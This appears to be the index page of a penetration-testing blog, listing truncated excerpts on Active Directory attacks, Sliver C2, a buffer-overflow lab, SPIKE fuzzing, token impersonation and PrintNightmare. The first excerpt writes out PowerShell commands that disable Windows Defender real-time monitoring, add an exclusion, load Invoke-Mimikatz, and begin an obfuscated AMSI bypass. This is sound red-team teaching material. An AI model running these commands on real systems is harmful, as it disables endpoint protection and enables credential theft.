articles

Préparation de l’environnementExécution en tant qu’administrateur1234Start-Process PowerShell_ISE -Verb RunAs Add-MpPreference -ExclusionPath "C:\Temp" Set-MpPreference -DisableRealtimeMonitoring $true Import-Module C:\Temp\Invoke-Mimikatz.ps1 Si windows defender ne peut pas être désactivé, faire un AMSI Bypass1S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`...

As part of internal penetration testing in Active Directory environments, it is often necessary to execute remote commands on Windows machines. Several tools are available for this purpose, but one of the most widely used is wmiexec. The general principle of wmiexecwmiexeclets you execute remote commands without copying files or creating services on the target machine. It is based onWMI (Windows Management Instrumentation)`, a native Windows technology for controlling a local or remote sy...

Introducing SLIVER C2Sliver is an open-source command and control (C2) framework developed by Bishop Fox, which enables Red Team teams to simulate realistic attacks. It combines modularity, security and flexibility for modern penetration testing. What is a C2 framework?A C2 framework enables compromised machines to be remotely controlled by implants (or agents). These implants receive instructions from the C2 server, such as executing commands, transferring files or gathering information. The...

In most Active Directory infrastructures, each workstation has a local administrator account. This account is often poorly managed, and in some cases its password is identical on all machines. As a result, an attacker who compromises one of the machines can easily pivot on the network. To solve this problem, Microsoft introduced LAPS v1 (Local Administrator Password Solution) in 2015, then released a more comprehensive version in 2023. This article looks at how the two versions work, and the ...

ObjectiveExploit a buffer overflow vulnerability in an application by taking control of the EIP register and executing shellcode. 1. connect to the target and launch vulnserverRDP connection to target : 1rdesktop -u IEUser -p 'Passw0rd!' 172.16.5.120 Launching vulnserver with : 1vulnserver.exe 9999 Interacting with the server from our machine, we notice that depending on how we type the command and what we send, we get different responses. 2. Fuzzing with SPIKECreate a trun.spk sc...

This article will be a walkthrough of the ine lab concerning this attack. PowerviewPowerview is a PowerShell tool for reconnaissance in Windows domains. It contains a set of Powershell commands that replace the classic Windows commands of the net * type. We start the lab by opening a powershell command prompt and enabling script execution: Next, we can find the domain machines on which the current user is administrator: You can then launch a powershell session with one of these machines: HF...

What is SPIKESpike is a protocol fuzzer creation kit. It provides an API for creating your own fuzzers for network protocols, using the C++ language. SPike provides a series of basic commands for generating fuzzed messages to be sent to a network service. Scriptiong SPIKEFor TCP-based server applications, we use scrpit .spk with the generic_send_tcp interpreter (preinstalled on Kali Linux). The basic syntax is : 1generic_send_tcp <IP> <port> <script.spk> <SKIPVAR> <...

A token is a temporary key that enables you to access a system or network without having to give credentials every time you access a resource. These tokens contain information such as : User identity Groups to which the user belongs User privileges There are two types of token: Delegate: Created when a user logs on to a machine or connects to a machine via RDP, these tokens enable a user to usurp the identity of a user on another machine on the network (e.g. a service accessing files on an...

DefinitionServer Message Block (SMB) is a protocol for sharing files, accessing printers and other resources on a network. It is generally present on ports 445 and 139. It is natively included on Windows. For Linux machines, it is necessary to first install a Samba server, as Linux does not use this protocol by default. SMB enumerationSMB enumeration aims to discover the different shares available on the network, the access permissions to the share and the users and groups present on the mac...

DefinitionPrintNightmare is an attack exploiting a vulnerability in the Windows print spooler which allows a simple user to execute remote commands with administrator privileges. The term PrintNightmare actually refers to two vulnerabilities exploiting the print spooler. One allows privilege escalation and the other allows remote code execution. In this article, we’ll focus solely on the latter. On June 7, 2021, Microsoft released its latest security patch for this vulnerability, which allows...